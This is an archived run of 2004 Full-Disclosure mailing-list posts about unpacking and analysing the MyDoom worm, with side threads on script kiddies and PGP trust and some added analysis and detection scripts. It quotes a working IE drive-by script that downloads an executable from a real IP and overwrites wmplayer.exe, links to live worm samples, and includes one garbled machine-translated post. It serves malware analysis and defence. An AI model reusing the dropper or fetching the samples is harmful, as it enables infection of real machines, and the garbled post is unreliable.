Re: [Full-Disclosure] MyDoom download info

2004-01-31 Thread Puneet Arora
I think Daniel E. Spisak is quite right: why would anyone post a virus/backdoor creation of his
own?
Also, if he wanted to, he would have distributed it in executable form, not
the zipped one, right?
- Original Message - 
From: "first last" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Saturday, January 31, 2004 5:58 AM
Subject: RE: [Full-Disclosure] MyDoom download info


> > > to successfully unpack the program. All they really needed to
> > > do was dump it from memory while it was running and they could've
> >analyzed
> > > it immediately with any disassembler.
> >
> >Forgive me, I am no assembly hacker nor much of a programmer,
> >but would it be possible for a program to 'react' in some way
> >were one to try to dump it from memory?
>
> The program would have to use a device driver to protect itself from not
> being dumped from memory to disk. But there are ways around that as well.
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] MyDoom download info.

2004-01-31 Thread Feher Tamas
Hello,

>http://www.nonmundane.org/~dspisak/danger/MyDoomB.exe

Ran it under VMware and confirmed: Aladdin StuffIt format self-
extracting archive, contains the MyDoom.B worm executable (29,184 bytes) 
inside.

However the AV industry standard is always to send virus samples in 
passworded ZIP archive format and nothing else. Never trust 
executables!

BTW, apparently there is a yet undiscovered bug in the MyDoom.B code 
that prevents it from spreading effectively. Much of the code is 
encrypted, so dissecting proceeds slowly.

Regards, Tamas Feher.




RE: [Full-Disclosure] MyDoom download info.

2004-01-31 Thread first last
> BTW, apparently there is a yet undiscovered bug in the MyDoom.B code
> that prevents it from spreading effectively. Much of the code is
> encrypted, so dissecting proceeds slowly.

It's still UPX packed, but it won't unpack with "UPX -d" because the author 
used a simple UPX scrambler. Either undo what he did or unpack it manually 
and you'll see all the code. The easiest way for anyone inexperienced with 
this is just to dump the memory to a file when the virus is running. But you 
don't think the anti-virus companies already know everything about this 
virus? It's been a few days now and they should've found out everything they 
needed to know the very same day they got their first copy of MyDoom.B.



Re: [Full-Disclosure] MyDoom download info.

2004-01-31 Thread first last
> > It's still UPX packed, but it won't unpack with "UPX -d" because the 
> > author used a simple UPX scrambler. Either undo what he did or unpack it 
> > manually and you'll see all the code.
>
> It actually un-UPX-ed just fine for me. What version have you been trying?

MyDoom.B as posted by someone else on this list. UPX -d doesn't work so you 
have to do it manually which shouldn't be a problem.

> It disassembled nicely after that. The only other obfuscation (apart from
> quite a bit of wild jmp'ing around) is the rot13'ed strings, which isn't,
> erm, too challenging. Anything else?

Anyone with basic assembler knowledge could understand MyDoom and any other 
virus.



Re: [Full-Disclosure] MyDoom download info.

2004-01-31 Thread jan . muenther
> It's still UPX packed, but it won't unpack with "UPX -d" because the author 
> used a simple UPX scrambler. Either undo what he did or unpack it manually 
> and you'll see all the code. 

It actually un-UPX-ed just fine for me. What version have you been trying?
It disassembled nicely after that. The only other obfuscation (apart from
quite a bit of wild jmp'ing around) is the rot13'ed strings, which isn't,
erm, too challenging. Anything else? I've only looked quickly at it during a
train ride.




Re: [Full-Disclosure] MyDoom download info.

2004-01-31 Thread jan . muenther
> >It actually un-UPX-ed just fine for me. What version have you been trying?
> 
> MyDoom.B as posted by someone else on this list. UPX -d doesn't work so you 
> have to do it manually which shouldn't be a problem.

Oh, that clarifies it - I've just been looking at a copy of .A as it came to
me en masse. Of course de-UPX'ing manually is not a problem. 

> Anyone with basic assembler knowledge could understand MyDoom and any other 
> virus.

Well, I'd be a tad bit careful with the 'any' bit, but the recent stuff or
your everyday malware is really not at all hard to understand, which is why
large part of the discussions here sort of amazed me. 
What I want to say: My point exactly.

Cheers, J.



[Full-Disclosure] REST and Virii?

2004-01-31 Thread jim
Is it possible that we never analyze the whole picture, and that virii are much more 
coordinated?

REST stands for REpresentational State Transfer, and is an architectural style for 
large-scale software design.

REST suggests that what the Web got right is having a small, globally defined set of 
remote methods (HttpMethods: GET, POST, PUT, DELETE, etc) applied to any thing 
(specifically, any resource), because such a system allows a maximum number of 
otherwise uncoordinated actors to interoperate.

Take a closer look at:
http://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm

--
Jim



[Full-Disclosure] mydoom.exe decyphering?

2004-01-31 Thread Danny


Sophos says:
 (sync-1.01; andy; I'm just doing my job, nothing personal, sorry)

OK, this can readily be deduced somewhat from the mydoom.exe but not 
entirely. Ironically Aladdin Systems can find itself back in the worm's 
'strings' output... a part of it is compressed with StuffIt.

[download MyDoomB, cut out the StuffIt part, unstuff it and cut out the 
(3rd/last) data part (use tail or so). Then hexdump -C that one again]

Here's the part with the text (use fixed font in your mail client):

HEX ff  87  22  92  00  0a  0a  28  73  79  6e  63  2d  31  2e  fd
ASCII   *   *   32  *   0   10  10  40  115 121 110 99  45  49  46  *
SYMBOL  *   *   "   *   *   *   *   (   s   y   n   c   -   1   .   *

HEX ff  6f  ff  30  31  3b  20  61  6e  64  79  5   49  27  6d  20
ASCII   *   111 *   48  49  59  32  97  110 100 121 5   73  39  109 32
SYMBOL  *   o   *   0   1   ;   a   n   d   y   *   I   '   m

HEX 6a  75  73  74  20  64  6f  69  6e  67  20  6d  79  6b  ff  ef
ASCII   106 117 115 116 32  100 111 105 110 103 32  109 121 107 *   *
SYMBOL  j   u   s   t   d   o   i   n   g   m   y   k   *   *

HEX bf  0d  6f  62  2c  20  6e  6f  74  68  0f  70  65  72  73  6f
ASCII   *   13  111 98  44  32  110 111 116 104 15  112 101 114 115 111
SYMBOL  *   *   o   b   ,   n   o   t   h   *   p   e   r   s   o

HEX 6e  61  6c  11  06  a6  fb  ae  7d  72  72  79  29  42  47  40 
ASCII   110 97  108 17  6   *   *   *   125 114 114 121 41  66  71  64
SYMBOL  n   a   l   *   *   *   *   *   }   r   r   y   )   B   G   @

So: (sync-1...o.01; andy.I'm just doing mykob, noth.personal.}rry)

A few observations:

- 'noth*' seems to get its 'ing ' part from the token 'doing '
- likewise ' just' must be the inspiration for ' job' replacing the ' j' with 
'k' where * are non ascii. Note that ' just' fits into '' and j=k-1 
- '*}rry' should translate to ' sorry' or (sophos) ', sorry'
- is it sync-1.01 or perhaps sync-1.1.p01 or so, anyone has any idea what this 
sync is anyway
- if BG@ at the end could in some way end up being 'BEGIN' we have an 
uuencoded remainder which would have to be 'decrypted' first.
- how did sophos fill in the blanks, or did they

One would think the entire data chunk would be encrypted or encoded or 
whatever you want to call it in the same manner (something like uuenc/decode 
can be used to have binary data be changed and obfuscated as text and 
restored to binary through a 1 on 1 (de)obfuscation, right?).

Any thoughts? Is this a known algorithm that I'm not aware of for unicode 
compressing or something alike? How do other people investigate a binary? (I 
look at hexdumps, strings, output of 'file', magic numbers/strings...)

Let me dare say something I'm going to regret (heck this list is full of 
flamethrowers anyway ;-) To be honest, I have an unpleasant feeling that this 
whole thing might be staged. It's so suggestive. But I lack the skill to look 
further and don't passionately care enough either. Yet, this is one 
interesting thing with the whole MS and SCO background.

Please note, I use FreeBSD exclusively, not Windows, but was bored and got 
interested, and I'm wondering if anyone has done any research or 
experimenting on this. I've looked at them on my FreeBSD desktop box. I'm not 
familiar with Windows code other than looking at some worm and noticing that 
it has smtp code or so. The things with archives within executables holding 
executables and even with a Mac archiving package being used, uhhmm I'll pass 
on that and just assume that that's all normal and doable out there over the 
fence :) 



Hope you don't blame me for trying to have some interesting discussion. No 
matter what your skill level, it sure beats the ever present pissing 
contests. 

Regards,

--Dan (normally lurker with habitual attraction to DEL key)

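Dan asks above how other people investigate a binary (hexdumps, strings, magic numbers), and an earlier reply notes that MyDoom's only string obfuscation is ROT13. The script below is an added example written for this page, not code from any poster or from the worm: a small first-pass triage that reports known magic values at any offset (PE stub, ZIP, classic and StuffIt 5 archive headers, the UPX pack-header marker), pulls printable strings the way strings(1) does, and flags the strings that only start to look like mail or URL text after ROT13. The input buffer is constructed inline and contains no real malware; the keyword list and the minimum string length are the author's choices.

```python
import re


def rot13_bytes(data: bytes) -> bytes:
    """ROT13 over ASCII letters only; every other byte passes through unchanged."""
    out = bytearray()
    for b in data:
        if 65 <= b <= 90:
            out.append((b - 65 + 13) % 26 + 65)
        elif 97 <= b <= 122:
            out.append((b - 97 + 13) % 26 + 97)
        else:
            out.append(b)
    return bytes(out)


# Constructed sample buffer, NOT a real worm: a DOS/PE stub fragment, a UPX
# pack-header magic, an embedded classic-StuffIt marker, one clear-text vendor
# string and two ROT13-obfuscated strings of the kind the posts describe.
SAMPLE = (
    b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 24
    + b"This program cannot be run in DOS mode.\r\n$" + b"\x00" * 8
    + b"UPX!\x0d\x09\x02\x08" + b"\x00" * 8          # "UPX!" magic, then version/format/method/level bytes
    + b"SIT!" + b"\x00" * 6 + b"rLau" + b"\x00" * 4  # classic StuffIt: "SIT!" at 0 and "rLau" at 10 of the archive
    + b"Aladdin Systems\x00"                         # clear-text string (StuffIt's vendor)
    + rot13_bytes(b"Subject: Mail Delivery System") + b"\x00"
    + rot13_bytes(b"http://host.invalid/update.exe") + b"\x00"
)

MARKERS = [
    (b"MZ", "DOS/PE executable header"),
    (b"PK\x03\x04", "ZIP local file header"),
    (b"SIT!", "classic StuffIt archive header"),
    (b"StuffIt (c)1997", "StuffIt 5 archive header"),
    (b"UPX!", "UPX pack-header magic"),
]

# Tokens an analyst expects in a mass-mailer's clear text; chosen for this example.
KEYWORDS = ("smtp", "mail", "from", "subject", "http", ".exe", "windows", "software")


def find_markers(buf: bytes):
    """Every offset at which a known magic string occurs. The 2-byte 'MZ' is
    noisy in large inputs; read a non-zero 'MZ' hit as 'embedded executable?'."""
    hits = []
    for sig, label in MARKERS:
        pos = buf.find(sig)
        while pos != -1:
            hits.append((pos, label))
            pos = buf.find(sig, pos + 1)
    return sorted(hits)


def extract_strings(buf: bytes, min_len: int = 6):
    """strings(1)-style: maximal runs of printable ASCII of at least min_len bytes."""
    rx = re.compile(rb"[\x20-\x7e]{" + str(min_len).encode() + rb",}")
    return [m.group().decode("ascii") for m in rx.finditer(buf)]


def _score(text: str) -> int:
    low = text.lower()
    return sum(1 for k in KEYWORDS if k in low)


def rot13_candidates(buf: bytes, min_len: int = 6):
    """Printable runs that score higher on the keyword list after ROT13 than
    before. Returns (as stored, decoded) pairs."""
    out = []
    for s in extract_strings(buf, min_len):
        decoded = rot13_bytes(s.encode("ascii")).decode("ascii")
        if _score(decoded) > _score(s):
            out.append((s, decoded))
    return out


if __name__ == "__main__":
    for off, label in find_markers(SAMPLE):
        print(f"{off:#06x}  {label}")
    for stored, decoded in rot13_candidates(SAMPLE):
        print(f"rot13  {stored!r} -> {decoded!r}")
```

On a real sample this is only the first pass: a runtime-packed worm shows almost nothing until it is unpacked or dumped from memory, which is exactly why the posts above say the strings only appear after de-UPXing.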


Re: [Full-Disclosure] MyDoom download info

2004-01-31 Thread Roland Dobbins
I know Dan Spisak personally, and can vouch for his honesty and 
integrity.

On Jan 30, 2004, at 4:38 PM, Scott Taylor wrote:

> Am I the only one that found it to be a little bit shady that these
> were made available as executables? Is the "B" version posted somewhere as
> just a plain zip? I don't seem to have already received my free copy in
> the mail yet.
>
> On Fri, 2004-01-30 at 12:17, Daniel Spisak wrote:
>
> > http://www.nonmundane.org/~dspisak/danger/README-FIRST.TXT
> > http://www.nonmundane.org/~dspisak/danger/MyDoomA.exe
> > http://www.nonmundane.org/~dspisak/danger/MyDoomB.exe
>
> --
> Scott Taylor - <[EMAIL PROTECTED]>
> BOFH Excuse #216:
>
> What office are you in? Oh, that one.  Did you know that your building 
> was built over the university's first nuclear research site? And wow, 
> aren't you the lucky one, your office is right over where the core is 
> buried!

-
Roland Dobbins <[EMAIL PROTECTED]> // 408.527.6376 voice


Re: [Full-Disclosure] Script Kiddies [OT]

2004-01-31 Thread qobaiashi
On Saturday, 31 January 2004 00:24, Remko Lodder wrote:
> "all i can say is they have to start somewhere"
>
> --> That is why my friends and i started Mostly-Harmless,
> we educate those persons by telling them what is good and what
> is wrong, so we can convince them script kiddie is not good
> having knowledge is good, (if u use it properly),
> so we tend to keep them on the right track, we also offer them
> hacking things, on our _own_ machines so they can not do any harm.
>
> Released exploits are indeed one of the reasons why some kids think it's
> easy
> but the most knowledged of us should know that education is our prime
> target.


OMG, are you a hacker school or something? THAT's kiddie production...!

-q

> Cheers
>
> --
>
> Kind regards,
>
> Remko Lodder
> Elvandar.org/DSINet.org
> www.mostly-harmless.nl Dutch community for helping newcomers on the
> hackerscene



[Full-Disclosure] Anyone looking to share arcane/unique/commercial OS mediums/sources

2004-01-31 Thread auto74651
mail me! :)






Re[2]: [Full-Disclosure] MyDoom download info.

2004-01-31 Thread Papp Geza
Hello last

On 31 January 2004 at 13:07:27, you wrote:

>> > It's still UPX packed, but it won't unpack with "UPX -d" because the
>>author
>> > used a simple UPX scrambler. Either undo what he did or unpack it
>>manually

This below VMware run and legalized  this also we can at that time we be
aware of because well, already. So that the worm is one selfextract archiv
file. Infect only so for the first time when if form himself executing
unfolds. This coming-out really infects dared infection to be little,
what the, MyDoom b contains.letter worm executing (29,184 byte) inside.
The AV we can industry stock, to send always virus.zip form.

One yet undiscovered bug in the MyDoom b over there may be, how.letter
code, but I do not calculate, so that encrypted would be able spreading.
Encrypted you process if intensively worm that way you anatomize, MydoomB
division  several enkrypted also is between internally codes code. I deem,
so that this within is not classified other, as: biddings.

This I mean this so, how core worm is our task, and execution's time she.
Since the author does not undo utilize UPX scramblin, the UPX D. Either
you want what unpacked you did you undo simpler, if this hand-held to see,
may not be to know to see all the code. True runs, how this the lightest
road towards anybody inexpert this him only dump the memory one file when
the virus.
 
I am aware of to deem, the anti-virus companies could this what already
every virus? Time found between two virus little, but during this little
time prospectors plenty of information. More prolonged assaying confirmed
after this him.

Must deem she virus, infection, while the UPX packed malware "dared "UPX
D"will not unpack this. True  MyDoom b gave up letter as by this somebody
other agendum. UPX D does not work so which must do one problem must not
be she hand-held.

This disassemble beautifully and then  natural, how to be challenge,
and non other. Anybody would mean collect can not BASIC lingua knowledge,
MyDoom and any other virus  his gear, their codes. The encrypted are codes
the fascinating: may not be to be aware of, so that within is hide.

Virus's writing how bidding yet  decoded solves and somebody this, shock
due will be aware of that what awaiting virus.

-- 
Regards,
  Geysap mailto:[EMAIL PROTECTED]

www.gyik.com
"VIRUS CORE TEAM"

Fiat justitia, pereat mundus!

we protect your digital worlds... 


Re: [Full-Disc]: [Full-Disclosure] mydoom.exe decyphering?

2004-01-31 Thread Anders
Hi,

> OK, this can readily be deducted somewhat from the mydoom.exe but not
> entirely. Ironically aladdin systems can find itself back in the worm's
> 'strings' output... a part of it is compressed with stuffit.

Are you looking at the files from the URLs posted yesterday? Those
were packed with stuffit before uploaded. The stuffit part is not in
the version that's ITW.

> So: (sync-1...o.01; andy.I'm just doing mykob, noth.personal.}rry)

> - how did sophos fill in the blanks, or did they

As discussed on the list, the files are packed with a runtime packer,
so, they have to be unpacked/dumped in order to see the unpacked data.

Best regards,
Anders




[Full-Disclosure] Mydoom DDoS attack time table

2004-01-31 Thread Gadi Evron
I apologize if in my previous email I didn't make it clear, this is an 
important issue for system administrators world wide, so I am emailing 
again in regard to this subject alone - a time table for the Mydoom DDoS 
attack.

In my post from the 30th of January with the subject: "Refuting 
tall-tales and stories about the Mydoom.A and Mydoom.B worms" -
we released an analysis of the Mydoom worms DoS mechanism, refuting 
rumors about it not existing (http://www.math.org.il/mydoom-facts.txt).

You can find a time table for when the DDoS attack will happen, as
calculated by a C program Joe Stewart wrote, at:
http://www.math.org.il/mydoom-a-timeline.txt
Mydoom.B has a time line too, but it can't be predicted as definitely
because of an extra random check.
For more information about the DoS attack itself performed by the worm, 
how and when (including reverse engineering bits) you should check the 
above mentioned article.

	Gadi Evron.



Re: [Full-Disclosure] MyDoom download info

2004-01-31 Thread Valdis . Kletnieks
On Sat, 31 Jan 2004 12:03:37 +1300, Steve Wray <[EMAIL PROTECTED]>  said:

> I've often thought that none of the viruses so far encountered on the
> net are actually serious.
> 
> What worries me are the viruses that have been around for a while
> and which have, so far, not been detected; these are the serious
> viruses (I'm assuming that they exist). Viruses that *don't* send
> vast amounts of email and hence get detected; viruses that *don't*
> run under a debugger, that *don't* give themselves away.

What worries me is we haven't seen *either* an actual damaging virus
(imagine if the last 2 lines of Mydoom were "sleep(4hours); exec("format c:);")
or a "sleeper" virus.  At least we can console ourselves with the thought
that a stealthy sleeper virus would almost by necessity have a very low
burn rate, and thus take a long time to compromise a significant number
of systems (if somebody has a way they'd like to share to spread quickly
while remaining stealthy, feel free to comment ;)

I wish I knew which one to be more worried about the lack of.. ;)



pgp0.pgp
Description: PGP signature


Re: [Full-Disclosure] MyDoom download info

2004-01-31 Thread Valdis . Kletnieks
On Fri, 30 Jan 2004 17:07:12 PST, Daniel Spisak said:

> from, let alone the fact that I PGP sign all my email to this list?

Somehow, I'd feel better about this claim if I had found key 0xFC9ABEE3
on any of the 6 public key servers I tried.  Bonus points for (a) having
a signature other than your own on the key, (b) having signatures to
connect it into the "strongly-connected set", and (c) knowing what the
strongly-connected set is, and why it's useful to be in it.


pgp0.pgp
Description: PGP signature
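The message above asks for three things of a key: a signature other than its own, signatures that connect it into the "strongly-connected set", and an understanding of what that set is. In a signature graph (an edge from signer to signee for each certification) the strongly-connected set is the largest strongly connected component: the keys from which every other key in the set can be reached along signatures, and vice versa. The following is an added example written for this page, not code from any list member or from any OpenPGP tool; it runs Kosaraju's algorithm over a constructed keyring of fictional owners (no real key IDs) to show which keys are in the set, which merely point into it, and which are self-signed islands.

```python
# Constructed keyring (fictional owners, not real key IDs): signer -> keys it has signed.
# Self-signatures are included because every key carries one; they never affect the SCC.
KEYRING = {
    "alice": {"alice", "bob", "carol"},
    "bob":   {"bob", "alice", "dave"},
    "carol": {"carol", "bob"},
    "dave":  {"dave", "alice"},
    "erin":  {"erin", "alice"},   # erin vouches for alice, but nobody has signed erin
    "frank": {"frank"},           # self-signed only, like a fresh key uploaded by its owner
}


def strongly_connected_components(sigs):
    """Kosaraju: two keys share a component iff each reaches the other along signature edges."""
    nodes = set(sigs)
    for signed in sigs.values():
        nodes |= set(signed)

    order, seen = [], set()

    def finish(n):                      # first pass: record DFS finishing order on the forward graph
        seen.add(n)
        for m in sigs.get(n, ()):
            if m not in seen:
                finish(m)
        order.append(n)

    for n in sorted(nodes):
        if n not in seen:
            finish(n)

    reverse = {n: set() for n in nodes}  # transpose: signee -> signers
    for n, signed in sigs.items():
        for m in signed:
            reverse[m].add(n)

    comps, seen = [], set()

    def collect(n, comp):               # second pass: DFS on the transpose in reverse finishing order
        seen.add(n)
        comp.add(n)
        for m in reverse[n]:
            if m not in seen:
                collect(m, comp)

    for n in reversed(order):
        if n not in seen:
            comp = set()
            collect(n, comp)
            comps.append(frozenset(comp))
    return comps


def strong_set(sigs):
    """The 'strongly-connected set': the largest component of the signature graph."""
    return max(strongly_connected_components(sigs), key=len)


def in_strong_set(sigs, key):
    return key in strong_set(sigs)


def signers_of(sigs, key):
    """Who has signed `key`, other than the key itself (Valdis's point (a))."""
    return sorted(s for s, signed in sigs.items() if key in signed and s != key)


if __name__ == "__main__":
    print("strong set:", sorted(strong_set(KEYRING)))
    for k in sorted(KEYRING):
        print(f"{k:6} signers={signers_of(KEYRING, k)} in_strong_set={in_strong_set(KEYRING, k)}")
```

Being in the set is what makes a key checkable by strangers: anyone already inside has some chain of signatures leading to it, so a key that is only self-signed, or only signed by keys nobody else has signed, proves nothing to a list reader.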


Re: [Full-Disclosure] another Trojan with the ADO hole? + a twist in the story

2004-01-31 Thread KF
Here's the other frame...

var x = new ActiveXObject("Microsoft.XMLHTTP");   // fetch the payload through the XMLHTTP control
x.Open("GET", "http://211.19.46.20/5.exe ", 0);   // synchronous GET (trailing space in the URL as posted)
x.Send(); 

var s = new ActiveXObject("ADODB.Stream");        // ADODB.Stream lets script write raw bytes to disk
s.Mode = 3;                                       // adModeReadWrite
s.Type = 1;                                       // adTypeBinary
s.Open();
s.Write(x.responseBody);                          // bytes of the downloaded executable

// overwrite Windows Media Player's binary (2 = adSaveCreateOverWrite) ...
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
// ... then trigger the mms: protocol handler so the replaced wmplayer.exe is launched
location.href = "mms://";

Gadi Evron wrote:
> The past Trojan horses which spread this way took advantage of the fact 
> web servers send an HTML 404 message if a file doesn't exist.
>
> The original sample - britney.jpg - was simply an html file itself, and 
> using that fact, and IE loading it. It was combined with one of the 
> latest exploits of the time (I don't think MS patched it yet), and 
> downloaded the Trojan horses.
>
> This time around there is actually a picture on the web page, of a real 
> honest to God girl. But in another frame.. the same story all over again.
>
> For blocking purposes, the (un-safe) URL is: http://ut.uk.to/cs.jpg .
>
> Gadi Evron.

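The frame KF posted and the britney.jpg trick Gadi describes share two tells: a URL that looks like an image but serves HTML, and a script that chains Microsoft.XMLHTTP, ADODB.Stream in binary mode, Write(responseBody) and SaveToFile onto a path under Program Files. The scanner below is an added example written for this page, not code from either poster; it takes a URL and the bytes fetched from it (from a proxy log, a mail gateway or a sandbox) and reports those tells. The three sample bodies are constructed inline with an intentionally invalid host name, and the marker list is the author's reading of the posted frame, not a complete signature for every variant.

```python
import os
import re
from urllib.parse import urlparse

IMAGE_MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"\x89PNG\r\n\x1a\n": "png",
}
IMAGE_EXTS = {".jpg", ".jpeg", ".gif", ".png"}

# Script markers of the fetch -> binary stream -> overwrite chain seen in the posted frame.
SCRIPT_MARKERS = {
    "xmlhttp_fetch": re.compile(rb"ActiveXObject\(\s*['\"]Microsoft\.XMLHTTP['\"]\s*\)", re.I),
    "adodb_stream":  re.compile(rb"ActiveXObject\(\s*['\"]ADODB\.Stream['\"]\s*\)", re.I),
    "binary_mode":   re.compile(rb"\.Type\s*=\s*1\b"),            # adTypeBinary
    "write_body":    re.compile(rb"\.Write\(\s*\w+\.responseBody\s*\)", re.I),
    "save_to_file":  re.compile(rb"\.SaveToFile\(", re.I),
    "program_files": re.compile(rb"Program Files", re.I),
    "remote_exe":    re.compile(rb"https?://[^\s'\"]+\.exe\b", re.I),
}
MARKUP = re.compile(rb"<\s*(html|script|frameset|iframe|frame)\b", re.I)


def sniff_image(body: bytes):
    """Image type by magic bytes, or None when the body is not a known image."""
    for magic, kind in IMAGE_MAGIC.items():
        if body.startswith(magic):
            return kind
    return None


def triage(url: str, body: bytes):
    """Human-readable findings for one fetched object; empty list means nothing matched."""
    findings = []
    ext = os.path.splitext(urlparse(url).path)[1].lower()
    if ext in IMAGE_EXTS and sniff_image(body) is None:
        findings.append(f"{ext} URL but body is not an image")
        if MARKUP.search(body):
            findings.append("image URL serves HTML/script (britney.jpg pattern)")
    hits = [name for name, rx in SCRIPT_MARKERS.items() if rx.search(body)]
    findings.extend(f"script marker: {h}" for h in hits)
    if {"xmlhttp_fetch", "adodb_stream", "save_to_file"} <= set(hits):
        findings.append("ADODB.Stream download-and-drop chain present")
    return findings


def is_suspicious(url: str, body: bytes) -> bool:
    return bool(triage(url, body))


# Constructed samples (nothing here was fetched; host.invalid cannot resolve).
REAL_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01" + b"\x00" * 32
BENIGN_HTML = b"<html><body><p>hello</p><script>document.title = 'x';</script></body></html>"
DROPPER_AS_JPG = rb"""<html><body><img src="girl.jpg">
<script language="JavaScript">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://host.invalid/5.exe", 0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe", 2);
location.href = "mms://";
</script></body></html>"""

if __name__ == "__main__":
    for url, body in [("http://host.invalid/photo.jpg", REAL_JPEG),
                      ("http://host.invalid/index.html", BENIGN_HTML),
                      ("http://host.invalid/cs.jpg", DROPPER_AS_JPG)]:
        print(url, "->", triage(url, body) or "clean")
```

The extension-versus-magic check is the cheap one to run on every image fetch at a proxy; the script markers are worth alerting on in any HTML a client receives, since a legitimate page has no reason to stream a remote .exe into Program Files.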


[Full-Disclosure] Re: Script Kiddies

2004-01-31 Thread darren
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


The only difference between a 'script kiddie' and 90% of the 'security
experts' out there are the tools they use.

They're both clueless but at least the 'script kiddie' didn't spend $5000
on ISS Hackcamp to learn his techniques.



-BEGIN PGP SIGNATURE-
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.3

wkYEARECAAYFAkAa0eYACgkQVkUxEVe6w3s0JwCeN8n4VveBGmbqTM1VL4j5qwIpascA
n1gBsEGhF4ep+S4Cr9WOTnIOII2X
=Wpoa
-END PGP SIGNATURE-



RE: [Full-Disclosure] Script Kiddies

2004-01-31 Thread DAN MORRILL
Kinda wanted to take a minute to think about this.

The big determiner between art and junk is passion. Regardless of what you 
do, if you're a good information security person, or a good hacker, you have a 
passion for the technology and the job. Doesn't really matter if you get 
paid for it or not, late evenings or not. If you have passion, then you have 
what it takes to excel in a field, any field, including information 
security.

There is a lot of passion for information security amongst some people, and 
for many it is just a job, don't take it so seriously, hey see the latest 
dilbert cartoon, and please read my blog.

I have only seen two attacks in 14 years of information security where I would 
like to meet the hacker. One from china, one from russia. Very good, still 
don't know how the boxes survived the attacks, they were that good, that 
targeted, and that unique. They had passion, should be the only ones allowed 
to have a CISSP or what ever certificate du jour is.

I think that is what Uncle is railing against, and if I am right, welcome to the 
side show. MCSE's and CISSP/CISA are all in the center ring right now. But 
like any circus, it too will fold up the tent, and the side show is what 
brings the "suckers born every minute" into the big top.

R/
Dan



From: "Uncle Scrotora Balzac" <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Script Kiddies
Date: Fri, 30 Jan 2004 08:23:38 -0800


I love hearing security people talk about script kiddies. It's the funniest
thing to see them walking around with their chests pushed out like 
peacocks, as they scoff at the silly little kiddy.





Re: [Full-Disclosure] MyDoom download info

2004-01-31 Thread Oliver Schneider
> Somehow, I'd feel better about this claim if I had found key 0xFC9ABEE3
> on any of the 6 public key servers I tried.  Bonus points for (a) having
> a signature other than your own on the key, (b) having signatures to
> connect it into the "strongly-connected set", and (c) knowing what the
> strongly-connected set is, and why it's useful to be in it.
I am quite new to this particular "security" list, and this mail is not
signed (which affects my credibility ;), however I find it disgusting how people
respond to each other here - one claiming to be smarter than the other but
also more insulting.
I know that signatures and trust are a very delicate topic, but when you
distrust anyone it's not necessary to show this in an insulting way - for your
words imply suspicions which might or might not be justified.

I also got the URLs from Daniel Spisak by private email before it was posted
here on the list. To calm down those who think it is necessary to have the
files packed as password-protected ZIP, here we go:

Download at: http://assarbad.net/stuff/temp/MyDoom.zip

Password for the ZIP archive "Full Disclosure" (without the quotes, of
course).
!!! THIS IS STILL MEANT FOR ANALYSIS AND DISASSEMBLING, ONLY !!!


Best regards,

Oliver Schneider
PS: I'll take the file down on 2004-02-05!



[Full-Disclosure] Re: Mail undeliverable and filtered

2004-01-31 Thread Paul Schmehl
--On Saturday, January 31, 2004 3:44 PM -0500 "[EMAIL PROTECTED]" 
<[EMAIL PROTECTED]> wrote:

> Your mail to [EMAIL PROTECTED]; was filtered because of
> the potential spam or virus keyword  [gambling]
> please contact the user by fax or telephone thank you.
>
> For this email filter system and other powerful software visit
> http://software.high-pow-er.com

Yeah!  That's high powered software all right!  I am highly impressed.

Sheesh.  (And this one will bounce too, no doubt.)

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu


Re: [Full-Disclosure] MyDoom download info

2004-01-31 Thread Paul Schmehl
--On Saturday, January 31, 2004 12:25 PM -0500 [EMAIL PROTECTED] 
wrote:

On Sat, 31 Jan 2004 12:03:37 +1300, Steve Wray
<[EMAIL PROTECTED]>  said:
What worries me is we haven't seen *either* an actual damaging virus
(imagine if the last 2 lines of Mydoom were "sleep(4hours); exec("format
c:);") or a "sleeper" virus.
This doesn't worry me much at all.  Since virus writing has been taken over 
by the scammers, spammers, criminals and thieves, the last thing they want 
to do is destroy their bots.  Their purpose isn't to infect and harm, it's 
to infect and use for their nefarious purposes - like the recent extortion 
attempts on online gambling sites (threatening to shut them down through 
DDoS during the Super Bowl thereby depriving them of large amounts of 
revenue.)

The irony is the vxers got replaced by the professional criminals.  Now the 
concern is not getting infected, it's making sure the computer is really 
and truly clean.  It would be nice if the malware *did* use exec(format 
C:).  It would save networks a lot of time cleaning up and identify the 
infected machines quickly. :-)

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu


Re: [Full-Disclosure] Re: Script Kiddies

2004-01-31 Thread ATD
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
So whats the difference between a script kiddie and a hacker in your 
opinion?  Would it be the same difference between the "cookie cutter" 
security professionals and the actual professional?  I'm curious.





[EMAIL PROTECTED] wrote:
> The only difference between a 'script kiddie' and 90% of the 'security
> experts' out there are the tools they use.
> They're both clueless but at least the 'script kiddie' didn't spend $5000
> on ISS Hackcamp to learn his techniques.




- --

	

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.1 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQFAHB4Rf3Elv1PhzXgRApCuAJ44MjupPcmZeNyegfsJVASlSRdUbgCdElBn
mX5s42tDLvRxPW/APlVSLn0=
=GhUp
-END PGP SIGNATURE-


[Full-Disclosure] MyDoom.b samples taken down

2004-01-31 Thread Daniel Spisak
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

I have been asked by McAfee to take down my copy of MyDoom.B as they 
have insinuated that I am now responsible for this virus spreading. 
